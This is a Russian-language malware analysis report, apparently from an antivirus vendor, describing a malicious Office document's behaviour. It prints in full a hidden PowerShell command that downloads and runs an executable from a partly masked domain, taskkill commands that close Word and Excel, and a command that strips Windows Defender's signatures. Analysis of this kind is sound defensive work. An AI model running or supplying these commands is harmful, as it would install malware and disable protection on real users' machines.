Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://pa####netwothree.ga/work/15.exe как c:\users\public\svchost32.exe
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
- '<SYSTEM32>\taskkill.exe' /f /im Excel.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe & exit
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im Excel.exe
- '<SYSTEM32>\cmd.exe' /c cd "%ProgramFiles%\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\mpcmdrun.log
Сетевая активность
UDP
- DNS ASK pa####netwothree.ga
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-Object System.Net.WebClient).DownloadFile('http://pa####netwothree.ga/work/15.exe','C:\Users\Public\svchost32.exe');Start-Process 'C:\Users\Public\svchost32.exe'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe & exit' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im Excel.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cd "%ProgramFiles%\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\windows defender\mpcmdrun.exe' -removedefinitions -dynamicsignatures
